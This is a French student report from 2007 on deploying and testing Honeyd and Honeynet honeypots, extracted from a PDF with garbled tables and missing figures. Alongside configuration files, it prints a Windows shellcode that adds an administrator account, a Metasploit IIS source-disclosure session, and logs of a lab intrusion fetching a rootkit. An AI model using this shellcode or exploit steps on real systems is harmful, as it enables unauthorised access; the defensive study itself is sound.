Professional Documents
Culture Documents
POTS DE MIEL
Etudiant :
Pham Quyet Thang
Superviseur : Victor Moraru
28 Janvier 2007
- 1 -
INTRODUCTION............................................................................................................................... 5
1.1
1.2
DEFINITION .................................................................................................................................. 5
CLASSIFICATION DES POTS DE MIEL.............................................................................................. 5
3.1
ARCHITECTURE GLOBAL ............................................................................................................ 25
3.2
INSTALLATION HONEYD............................................................................................................. 26
3.2.1
Configuration Honeyd .......................................................................................................... 28
3.2.2
Lancement et teste du fonctionnement .................................................................................. 31
3.3
INSTALLATION HONEYNET ......................................................................................................... 34
3.3.1
Configuration Honeynet ....................................................................................................... 37
3.3.2
Lancement et test du fonctionnement.................................................................................... 39
4
4.3
HONEYNET ................................................................................................................................. 50
4.3.1
Exploits sous WIN 2000 None Service Pack......................................................................... 50
4.3.1.1
4.3.1.2
4.4
STATISTIQUES DES ATTAQUES REELLES...................................................................................... 59
4.4.1
Honeyd.................................................................................................................................. 59
4.4.2
Honeynet sous WINXP SP 1 ................................................................................................. 64
5
CONCLUSION ................................................................................................................................. 69
REFERENCES.................................................................................................................................. 70
- 2 -
- 3 -
Remerciements
Je tien tout dabord remercier Monsieur le Professeur Victor Moraru pour
maider dans le Travail dIntrt Personnel Encadr lIFI
Je remercie tout particulirement Monsieur TRUONG TUNG Lam pour tous ces
conseils sur les connaissances de rseau dans lenvironnement de travail rel
dans lequel il travail.
Merci galement tous mes camarades dans la promotion XI qui ma support
un environnement de travail trs agrable.
- 4 -
Introduction
1.1 Dfinition
Dfinition
Honeypot, ou pot de miel : une ressource d'un rseau qui accrot la scurit en
tant mis l'preuve, attaque ou effectivement compromise. Ce leurre permet
de rcuprer des informations des mthodes, tactiques et/ou outils des pirates
[1].
Le fonctionnement de honeypot
- 5 -
2.1 Honeyd
2.1.1
Introduction
Honeyd est un pot de miel libre de type basse interaction , c'est--dire pas de
systme dexploitation rel pour permettre aux hackers dacqurir laccs de
dans, il ne simule que des services. Lors quil dcouvre un effort de connexion
un IP, il falsifie cette adresse IP mais pas offrir de systme rel et rpond au
pirate avec cette adresse feint. Ds ce moment l, il communique au hacker
comme une victime. Cest la signification principale du mot honeypot . En
effet, un Honeyd peut surveiller des milles dadresse IP et simuler les IPs au
niveau de IP stack . Dailleurs, Honeyd peut simuler des systmes
dexploitation diffrents simultanment [2].
Techniques surveillant des IPs
Pour surveiller des IPs non distribus dans le rseau local, Honeyd applique un
des deux techniques disponibles : blackholing et ARP spoofing .
Blackholing
- 6 -
Avec la technique blackholing , Honeypot est mis dans un rseau nonproduction , et tous les IPs dans la classe IP du rseau sont configures dans
le routeur pour re-expdier les trafics du rseau vers le Honeypot :
2.1.2
Fonctionnement
- 7 -
Figure 3 Honyed reoit des trafics pour honeypots virtuels en basant sur un
proxy arp et simule au niveau ip stack pour les systmes dexploitation
diffrente [8]
Dans cette configuration du rseau ci-dessus, honeyd est install sur la machine
10.0.0.2 (souvent sur une machine dUnix , la version sous WINDOWS est en
cours de dvelopper), avec le support dun routeur virtuel 10.0.0.1 qui est
configur dans le fichier de configuration du honeyd, ce routeur va diriger les
requtes aux IPs non distribus 10.0.1.101-10.0.1.103 vers les machines
virtuelles qui sont dfinis selon les templates dans fichier de configuration du
honeyd [8].
- 8 -
Composants du honeyd
Hte virtuel
- Personnalit : utiliser des empreints partir du fichier nmap ou xprobe.
- Ports : dfinition de ractions sur chaque port et son protocole.
- Services : dfinition des scripts combins sur chaque port et
personnaliser des paramtres pour chaque script.
Rseau virtuel
- Point dentre du rseau virtuel (ou routeur dentre) : deux sources
- 9 -
# Router/Routes Setup
route entry 10.0.0.1
route 10.0.0.1 link 10.0.1.0/24
# Router templates
create router_template0
set router_template0 personality
set router_template0 default udp
add router_template0 tcp port 22
add router_template0 tcp port 80
# Host templates
create default
set default personality "Windows XP Pro"
set default default icmp action open
add default tcp port 23 "router-telnet.pl"
- 10 -
"Windows XP Pro"
action reset
"router-telnet.pl"
"web.sh"
create host_template8
set host_template8 personality "Windows 98"
add host_template8 tcp port 22 "test.sh"
create host_template11
set host_template11 personality "Linux 2.4.20-8"
add host_template11 tcp port 23 "router-telnet.pl"
add host_template11 tcp port 22 "test.sh"
# Router bindings
bind 10.0.0.1 router_template0
# Host bindings
bind 10.0.1.101 host_template8
bind 10.0.1.102 host_template5
bind 10.0.1.103 host_template11
exemple, une attaque sous le protocole SSH Honeypot est dirige vers une
machine relle pour analyser facilement plus dtaill des activits en utilisant un
outil sniffeur (Snort, par exemple).
Figure 7 Un exemple du syslog une fois ayant une attaque au routeur de Cisco
[2]
Une autre ressource est un sniffeur (par exemple, Snort est un outil pour
capturer tous les activits et key-strokes mais par chiffres). Parce que les trafics
qui arrive au honeypot est considr comme les attaques, donc, les donnes
journalises du sniffeur sont des activits malicieuses. En utilisant un Honeypot
avec un sniffeur en mme temps, on peut rduire la capacit de transport loge.
Coordonner avec un outil danalyser des donnes journalises (Snort-Rep
- 12 -
2.1.3
Discussion
Les risques
Bien que Honeyd propose une solution assez bonne pour attirer des attaques,
dcevoir et rechercher le profil des pirates, mais il ne simule que les services
(pas de environnement rel) et ainsi le niveau de IP stack, donc les pirates nont
pas beaucoup de chances pour compromettre ces systmes. Par consquente,
les informations collectionnes ne ressemblent pas ce que on attend.
Dailleurs, utilisant un honeypot comme Honeyd est trs dangereux, une petite
faute dans la configuration peut provoquer un conflit de IP et perdre des paquets
lgaux envoys aux systmes de production.
2.2 Honeynet
Honeynet est un grand projet pour rechercher des attaques qui viennent de la
communaut des pirates. Lobjectif du projet est de rechercher des outils, des
tactiques et des motivations des hackers. Diffrer aux autres solutions de pot de
miel qui nmulent que des services ou modifient le noyau dun seul systme.
Avec Honeynet, aucune simulation, aucune modification, autrement dit, il fournit
des environnements rels comme Solaris, WINDOWS XP, Cisco etc .. avec leurs
services originales.
2.2.1
Introduction
Honeynet, ce nest pas un logiciel en paquetage, elle est une architecture dont
lide ressemble un seau ou les poissons sont dans le seau [2]. Honeynet est
le seau et les attaques sont des poissons. Ladministrateur observe des activits
malicieuses par les outils intgrs pour accomplir trois exigences suivantes :
contrler des donnes, capturer des donnes et collectionner des donnes (la
troisime pour les honeynets distribus). Contrler des donnes est de contrler
des activits du pirate, dassurer quil ne peut pas compromettre des autres nonhoney-systmes. Capturer les donnes pour observer ce qui sest pass dans le
honeynet. Le projet Honeynet cre un document dfinition, exigences, et
standard pour prsenter de ltape ltape de construire un Honeynet en
utilisant des outils disponibles (Snort, syslogd etc.) [2 Annexe D].
- 13 -
2.2.2
Fonctionnement
- 15 -
- 16 -
Sebek - Introduction
Le but du Sebek cest de dterminer des informations aprs le pirate compromet
un systme et quest-ce quil fait en suite. Pour arriver ce but, les informations
- 17 -
- 18 -
read(), write() ou socket() sest inscrit dans un tableau des fonctions du noyau.
Une fois que un client Sebek est install sur un honeypot, il change cette
adresse vers sa fonction. Chaque fois ayant un de ces activits, il sauvegarde
des informations comme processus id, pre de processus id, le tampon dentre
ou sortie, en suite il cre un paquet UDP (le mcanisme denvoyer ces paquets
est rfre plus dtaill dans http://project.honeynet.org/papers/sebek.pdf (la
partie Client Packet Export) et simplement appeler les fonctions originales read(),
write() ou socket().
- 19 -
- 20 -
Figure 15 La figure illustre les sources des donnes collectes dans un honeynet
Pour combiner des donnes sous les formes diffrentes et partir de plusieurs
ressources, Edward G. Balas propose un daemon qui traiter ces donnes en
ligne chaque fois quil y a un vnement (une connexion, un vnement IDS ou
un nouveau paquet du Sebek). La figure suivant va illustre plus clairement le flux
pour traiter des donnes du daemon Hflow.
- 21 -
- 22 -
- 23 -
- 24 -
Le fichier /var/log/secure
2.2.3
Discussion
- 25 -
- 26 -
Pour libevent
tar -xzf libevent-1.2.tar.gz
cd
libevent-1.2
./configure prefix={LIBEVENT_PATH}
make && make install
Pour libdnsres
tar -xzf libdnsres-0.1a.tar.gz
cd
libdnsres-0.1a
./configure prefix={LIBDNSRES_PATH} --with-libevent={LIBEVENT_PATH}
make && make install
Pour libpcap
tar -xzf libpcap-0.9.5.tar.gz
cd
libpcap-0.9.5
./configure prefix={LIBPCAP_PATH}
make && make install
Pour pcre
- 27 -
Attention :
Quand on lance arpd, il faut exporter le variable d'environnement
LD_LIBRARY_PATH
export LD_LIBRARY_PATH={LIBEVENT_PATH}/lib
3.2.1
Configuration Honeyd
- 28 -
Une fois que honeyd est lanc, il lit ce fichier et gnre les composants
correspondants, par exemple : les systmes d'exploitation configurs et/ou les
routeurs.
Par ailleurs, il y a 4 autres fichiers concernant honeyd:
- pf.os : contient la base de signature des systmes d'exploitation en
analysant des paquets qui arrivent.
- xprobe2.conf : dtermine les ractions aux outils empreintes ICMP.
- nmap.prints : contient la base d'empreintes pour tous les matriels et
systmes d'exploitation pour identifier les sources d'attaque.
- nmap.assoc : contient les noms correspondants les empreintes dans
nmap.prints.
Un exemple compltement :
./honeyd -d -f honeyd.conf.custom -a nmap.assoc -p nmap.prints -x
xprobe.conf -0 pf.os -l /tmp/log/honeyd.log -s /tmp/log/honeyd.server.log
10.0.1.0/24
Configurer un rseau virtuel reli la machine relle RH9 (kernel 2.4.20-8)
avec IP 10.0.0.5
Supposons que nous voulons crer un rseau virtuel avec deux machines
WINXP SP1 dans la classe C 10.0.1.0 avec deux adresses 10.0.1.6 et 10.0.1.7
sous un routeur Cisco virtuel 10.0.0.1
Fichier honeyd.conf.honeynet
Windows
Windows
Windows
Windows
Windows
Windows
Windows
Windows
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
port
port
port
port
port
port
port
port
23 "scripts/telnet/faketelnet.pl"
22 proxy 10.0.0.3:22
80 "scripts/win32/win2k/iis.sh"
139 open
137 open
135 open
445 open
443 open
create BSD
set BSD personality "BSDI BSD/OS 2.0 - 2.1"
- 29 -
BSD
BSD
BSD
BSD
BSD
BSD
BSD
BSD
BSD
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
port
port
port
port
port
port
port
port
port
21 "scripts/unix/linux/ftp.sh"
23 "scripts/telnet/faketelnet.pl"
22 proxy 10.0.0.3:22
80 "scripts/web.sh"
139 open
137 open
135 open
445 open
443 open
- 30 -
3.2.2
Condition pralable :
- Une machine host avec Linux RH9 IP 10.0.0.5 (dans ce cas c'est aussi
un honeypot Linux dans notre honeynet, la suite) dans laquelle on doit installer
arpd et honeyd (la partie prcdente).
- Une machine pour tester, ici c'est une machine Ubuntu 6.0.6 avec IP
10.0.0.13, tout d'abord on va utiliser la commande Ping pour scanner les
machines avec IP virtuels et Telnet pour essayer d'entrer ces machines.
Attention :
- En utilisant arpd avec un DHPC serveur cause un conflit sils grent une
mme classe IP de rseau. Pour viter a, nous laissons arpd de grer une autre
classe de IPs 10.0.1.0/24
- A partir la machine host, on ne peut pas vrifier les machines virtuelles
par la commande Ping. La commande Ping n'envoie pas le paquet vers sa carte
de rseau, c'est la raison pour laquelle on doit utiliser une autre machine.
Lancer :
Tout d'abord activer le daemon arpd.
#./arpd -d 10.0.0.1 10.0.1.6-10.0.1.7 10.0.1.0/24
Description
Machine host Linux RH9
Routeur virtuel Cisco
Machine virtuelle 1 WINXP SP1
Machine virtuelle 2 WINXP SP1
Machine test Ubuntu 6.0.6
- 31 -
Services offrites
Telnet
http, telnet, ssh
http, telnet, ssh
10.0.0.6
Telnet
Sending
Sending
Sending
Sending
Sending
Sending
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
Echo
Echo
Echo
Echo
Echo
Echo
Reply:
Reply:
Reply:
Reply:
Reply:
Reply:
10.0.1.7
10.0.1.7
10.0.1.7
10.0.1.7
10.0.1.7
10.0.1.7
->
->
->
->
->
->
10.0.0.13
10.0.0.13
10.0.0.13
10.0.0.13
10.0.0.13
10.0.0.13
icmp(1)
icmp(1)
icmp(1)
icmp(1)
icmp(1)
icmp(1)
10.0.0.13
10.0.0.13
10.0.0.13
10.0.0.13
10.0.0.13
10.0.0.13
10.0.1.7:
10.0.1.7:
10.0.1.7:
10.0.1.7:
10.0.1.7:
10.0.1.7:
8(0):
8(0):
8(0):
8(0):
8(0):
8(0):
- 32 -
84
84
84
84
84
84
Notre machine test envoie une requte vers la machine cible 10.0.1.6 sur
le port 23 pour demander une connexion. En fait, elle est en train de manipuler
avec un service sous un proxy vers une machine relle 10.0.0.6. Ci-dessous sont
des informations journalises par fichier de journal du honeyd.
L'cran du honeyd
honeyd[1185]: Connection request: tcp (10.0.0.13:44809 - 10.0.1.6:23)
honeyd[1185]: Connection established: (10.0.0.13:44809 - 10.0.1.6:23) -> proxy to
10.0.0.6:23
Dans la partie suivante, on va mettre cette machine (RH9) en derrire d'un parefeu-ponte dans un honeynet (3.1 Architecture globale).
- 33 -
OS
Configuration
Switch SmartLink
8 port
PC
- 34 -
PC
Laptop
Ubuntu (tester et
surveiller)
- 35 -
- 36 -
make
make install
3.3.1
Configuration Honeynet
Configuration du Honeywall
Une fois que Honeywall est install, la premire mission est de configurer le
systme. Honeywall, en fait, c'est un gateway qui surveille des flux d'entre et
sortie de Honeynet. Il fonctionne en mode de pont (bridge) et utilise iptable,
snort, et snort-inline pour contrler des donnes. Par ailleurs, il utilise galement
pcap-api pour capturer des donnes sur la carte de rseau. Honeywall fournit
une interface de type dialogue pour configurer le fichier /etc/honeywall.conf (Rf.
: www.honeynet.org/tools/cdrom/roo/manual/5-setup.html). Ci-dessous sont des
paramtres les plus importants et leur valeur.
Fichier /etc/honeywall.conf
# This Honeywall's public IP address(es)
HwHPOT_PUBLIC_IP=10.0.0.3 10.0.0.4 10.0.0.5
# The name of the externally facing network interface
HwINET_IFACE=eth0
# The name of the internally facing network interface
HwLAN_IFACE=eth1
# Enable the SEBEK collector which delivers keystroke and files
# to a remote system even if an attacker replaces daemons such as sshd
HwSEBEK=yes
# Specify the SEBEK destination host IP address
# [Valid argument: IP address]
HwSEBEK_DST_IP=0.0.0.0
# Specify the SEBEK destination port
- 37 -
- 38 -
3.3.2
- 39 -
- 40 -
- 41 -
Rf. : http://www.vividmachines.com/shellcode/shellcode.html
Shellcode
Dfinition : Shellcode est un fragment de code, chaque fois nous lanons ce
code, il renverra un shell distance. Il reprsente maintenant n'importe quel
octet qui sera insr dans un exploit pour accomplir une tche dsire.
Condition pralable : la connaissance de l'ensemble x86, de C, et systme
d'exploitation sous Linux et Windows.
- 42 -
;adduser.asm
[Section .text]
global _start
_start:
jmp short GetCommand
CommandReturn:
pop ebx
xor eax,eax
push eax
xor eax,eax
did this just in case
mov [ebx + 89],al
push ebx
mov ebx,0x77e6fd35
call ebx
xor eax,eax
push eax
mov ebx, 0x77e798fd
call ebx
GetCommand:
;the N at the end of the db will be replaced with a null character
call CommandReturn
db "cmd.exe /c net user USERNAME PASSWORD /ADD && net localgroup
Administrators /ADD USERNAMEN"
- 43 -
- 44 -
Dans plusieurs cas, ladresse du dbut du shellcode est trs loin de la fonction
prcdente, dans ce cas l, il faut ajouter les opcodes NOP (\x90 pour i386)
dans son PAYLOAD. Donc si lon voie les opcodes NOP dans un paquet, peut
tre cest une attaque.
Pour faire une attaque, tout dabord il faut crire un shellcode et trouver une
exploitation de dpassement de tampon, a dpend chaque exploitation, on
ajoute des NOPs dans le PAYLOAD .
4.1.2
Metasploit
Rf. : http://www.metasploit.com/
Metasploit est une plateforme pour dvelopper, tester et utiliser les exploitations.
Elle est un outil trs puissant pour la recherche des exploitations.
Metasploit fonctionne en basant sur les PAYLOADs et les EXPLOITs
sous les systmes dexploitation et les services qui offrent sur ces systmes. Par
ailleurs, il combine les PAYLOADs et les EXPLOITs pour chaque type de
vulnrabilit et devient un outil trs fort.
Dans les parties suivantes, on va utiliser cet outil pour tester des exploitations
sur les honeypots.
4.2 Honeyd
4.2.1
4.2.1.1
Scnario dune attaque : Supposons que un pirate scanne le plage de notre IPs
virtuel 10.0.1.0/24 et trouve un serveur web IIS vulnrable. Pour attirer son
attaque, on doit changer un peut le fichier de configuration de honeyd :
add Windows tcp port 80 proxy 10.0.0.6:80
On dirige les requtes vers une machine relle WIN XP SP2 mais elle nest pas
dans Honeynet (elle est spare avec Honeynet) pour capturer des flux de
sortie.
Le but de lattaque cest de voir le code original de source du fichier web, pas
sous forme retourne HTML, on utilise un exploit dans outil Metasploit pour
- 45 -
accomplir ce travail. En ralit, cet exploit ne fonctionne que sur les anciennes
versions IIS (V .4.x). Dans XP SP2 IIS est 5.1.
Ci-dessous sont les options de cette exploitation dans Metasploit
msf > use iis_source_dumper
msf iis_source_dumper > set TARGET 9
TARGET -> 9
msf iis_source_dumper > set RHOST 10.0.1.6
RHOST -> 10.0.1.6
msf iis_source_dumper > set FORCE 1
FORCE -> 1
msf iis_source_dumper > show options
Exploit Options
===============
Exploit:
-------required
required
required
optional
optional
required
Name
-----SSL
RHOST
RFILE
VHOST
FORCE
RPORT
Default
-----------0
10.0.1.6
iisstart.asp
1
80
Description
------------------------------------The target port
The target address
The remote file path
The virtual host name of the server
Force testing when sanity check fails
The target port
Analyses des journaux : Avec la cible 10.0.1.6 et loption FORCE est vrai, la
machine de source va attaquer sans arrt. La figure ci-dessous va illustrer ce qui
sont capturs par Honeywall.
- 46 -
La partie (en bleu) cest lexploitation pour voir le code de source du fichier *.asp,
elle est dans la base de signature du Snort sur Honeywall.
En fait, puis que lon utilise un proxy pour diriger des requtes vers la machine
de dehors du honeynet, donc on a encore des donnes supplmentaires
captures par Honeywall et le client Sebek sur la machine host 10.0.0.5 (RH9).
Avec les paquets envoys par le client Sebek, Hflow peut construire un arbre des
processus concernant les sous processus dans honeyd, en effet cest une bonne
faon pour imaginer quest ce qui sest pass dans honeyd.
- 47 -
4.2.1.2
On dirige les requtes vers une machine relle WIN XP SP2 mais elle nest pas
dans Honeynet (elle est spare avec Honeynet) pour capturer des flux de
sortie. Sur cette machine, on installe FreeFTPd, cest un daemon vulnrable.
Le but de cette exprimentation est de tester lefficace quand on combine
honeyd avec honeynet, pour tester la capacit de capturer des flux des donnes
du Honeywall.
Ci-dessous sont les oprations pour faire une intrusion vers ladresse virtuel
10.0.1.7
- 48 -
- 49 -
4.3 Honeynet
4.3.1
4.3.1.1
Automatic
Windows 2000
Windows XP
from
from
from
from
10.0.0.6:
10.0.0.6:
10.0.0.6:
10.0.0.6:
bytes=32
bytes=32
bytes=32
bytes=32
time<10ms
time=10ms
time=40ms
time<10ms
TTL=128
TTL=128
TTL=128
TTL=128
- 50 -
06:01p
<DIR>
WINDOWS
06:06p
<DIR>
Documents and Settings
02:51p
<DIR>
Program Files
06:15p
14 testlsass.txt
12:30a
16 test.txt
01:02a
5 testXP.txt
01:48p
433,192 newrootkit.exe
02:06p
424 test1.txt
5 File(s)
433,651 bytes
3 Dir(s) 19,115,147,264 bytes free
C:\>ftp 10.0.0.6
ftp 10.0.0.6
User (10.0.0.6:(none)): thangpq
En analysant les paquets capturs par Snort sous forme pcap, on trouve il existe
un fragment de code malicieux dans cette session. Mais dans ce cas, Snort
nalerte par ce fragment (peut tre il nexiste pas dans la base de signature du
Snort).
- 51 -
- 52 -
Commande ftp
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
01/27-15:05:53.798140 AA:0:4:0:A:4 -> 0:10:5A:5E:F0:37 type:0x800 len:0x4F
10.0.0.13:46242 -> 10.0.0.4:4444 TCP TTL:64 TOS:0x0 ID:56139 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x5A9DF9C8 Ack: 0x7DBD19C3 Win: 0x8D8 TcpLen: 32
TCP Options (3) => NOP NOP TS: 5541373 38793
66 74 70 20 31 30 2E 30 2E 30 2E 36 0A
ftp 10.0.0.6.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Dans cette session, quand il envoie son mot de passe (de thangpq), il existe une
erreur dans son programme, donc le mot de passe nest pas envoy et il ne peut
pas russir se connecter au serveur.
Avec le support des paquets du client Sebek, on galement capture la connexion
entre la machine compromise et le serveur ftp
Comme ce qui est dj abord dans la partie thorique, Hflow daemon collecte
des donnes partir de plusieurs ressources et construire un arbre des
processus sur un honeypot compromis.
Ci-dessous est larbre des processus concerns la connexion ftp et ping.
- 53 -
- 54 -
Les informations acquises ici ne sont pas intressantes, en fait le compte envoy
vers la machine compromise par le back-door , il napparat pas ici, parce que
le client Sebek ne capture que un octet dentre ou sortie, donc Hflow ne
combine pas le compte et mot de passe au processus ftp. Cest une faiblesse de
Hflow.
En rsume, aprs avoir analys des donnes journalises par Honeywall, on
peut savoir les activits principales du pirate : il a compromis le systme par une
exploitation sur le service netbios-ssn (en fait cest une faute dans le module
lsass), et ensuite il essaie de tlcharger quelques choses sur son serveur ftp.
4.3.1.2
- 55 -
En analysant les paquets capturs par Snort sous forme pcap, on trouve il existe
- 56 -
un fragment de code malicieux dans cette session. Mais dans ce cas, Snort
nalerte par ce fragment (peut tre il nexiste pas dan la base de signature du
Snort).
20
34
74
38
36
20
20
3B
2E
75
20
4F
20
32
74
73
44
4B
20
48
78
2E
69
1B
20
2E
74
65
72
5B
20
2F
1B
78
65
31
20
1B
5B
65
63
38
20
5B
31
1B
74
3B
20
31
36
5B
6F
31
20
35
3B
31
72
48
20
3B
31
37
79
66
20
31
48
3B
20
74
20
48
6D
31
73
70
1B
74
73
48
65
3A
5B
65
67
32
6E
20
- 57 -
.[
14;2H./.[15;1Hte
st.txt.[16;1Hmsg
r8us.exe.[17;1H2
26 Directory sen
d OK.[18;1Hftp:
33 32 20 62 79 74 65 73 20 72 65 63
64 20 69 6E 20 30 2E 30 30 53 65 63
20 33 32 30 30 30 2E 30 30 4B 62 79
73 65 63 2E 1B 5B 31 39 3B 34 48 3E
20 6D 73 67 72 38 75 73 2E 65 78 65
6F 6F 74 6B 69 74 2E 65 78 65 20 20 20 20 20 20
65
6F
74
20
20
69
6E
65
67
6D
76
64
73
65
79
65
73
2F
74
72
32 bytes receive
d in 0.00Seconds
32000.00Kbytes/
sec..[19;4H> get
msgr8us.exe myr
ootkit.exe
01/14/2007
01/14/2007
01/17/2007
01/16/2007
01/22/2007
01/22/2007
01/27/2007
01/27/2007
01/27/2007
06:01p
06:06p
02:51p
06:15p
12:30a
01:02a
01:48p
02:06p
03:47p
<DIR> WINDOWS
<DIR> Documents and Settings
<DIR> Program Files
14 testlsass.txt
16 test.txt
5 testXP.txt
433,192 newrootkit.exe
424 test1.txt
433,192 myrootkit.exe
- 58 -
Honeyd
- 59 -
- 60 -
- 61 -
La plupart des ports connects sont les ports des services Microsoft.
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Cest la raison pour laquelle ces ports ont les plus de connexions, parce que la
plupart des clients du Viettel utilisent WINDOWS et le service de partager des
ressources est configur dans les versions de WINDOWS.
En fait, si on nutilise que honeyd pour surveiller des requtes, cest difficile de
distinguer entre les requtes gales ou illgales. Actuellement il y a beaucoup
des attaques en reliant ces ports.
En suite cest la statistique du nombre des connexions par heure.
- 62 -
En analysant les paquets capturs par Honeywall on trouve la signature dans les
paquets.
- 63 -
Dans cette requte il utilise une machine 125.235.75.95 pour traduire le code de
source du fichier web.
4.4.2
Dans cette partie, je vais montrer les activits captures dans la condition relle
sur la machine WINXP SP1.
La figure suivant illustre la configuration du rseau dans cette situation.
- 64 -
- 65 -
2h14 on a une requte sur port 135 du honeypot et tout de suite la victime se
connecte ladresse du pirate.
Ci-dessous est le paquet captur par Honeywall dans la premire session TCP.
- 66 -
5.1 Honeyd
5.1.1
Avantages
- 67 -
5.1.2
Inconvnients
5.2 Honeynet
5.2.1
Avantages
Le premier avantage du honeynet cest quil analyse bien des attaques en basant
sur plusieurs des logs : log bas sur hte (sebek) et log bas sur flux de rseau
(iptable, snort, tcpdump).
Le deuxime avantage est flexible et doffrir des systmes dexploitation et des
services rels. On peut ajouter une machine avec nimporte de systme
dexploitation et nimporte de service dans Honeynet.
Le troisime avantage, chaque machine dans Honeynet a une adresse
permanente donc il ny a pas de conflit des IPS avec les autres systmes dans le
- 68 -
rseau de production.
5.2.2
Inconvnients
Conclusion
En gnral, je trouve que Honeypot est un concept trs gnral, parce
- 69 -
Rfrences
[1] Olivier Mnager Comment les honey pots leurrent les pirates
http://www.01net.com/article/187399.html le 01/06/2002
[2] Honeypnet project . Lance Spitzner. 2002 Traching Hacker : Addison
Wesley
[3] Honeynet project. Srie articles 2001. Know Your Enemy .
http://project.honeynet.org/book/
[4] Honeypnet project . Lance Spitzner The Value of Honeypots Part 1 et 2:
http://www.securityfocus.com/infocus/1492
[5] Snort website http://www.snort.org
[6] http://security.rbaumann.net/download/diplomathesis.pdf Honetpots diploma
thesis de Reto Baumann
[7] http://www.honeypots.net/honeypots/links
[8] http://niels.xtdnet.nl/papers/honeyd.pdf A Virtual Honeypot Framework Niels
- 70 -
Provos
[9] http://www.paladion.net/papers/simulating_networks_with_honeyd.pdf
[10] http://www.honeynet.org
[11] http://www.honeyd.org
[12] http://www.honeypots.net
Et les rfrences dans ce rapport
- 71 -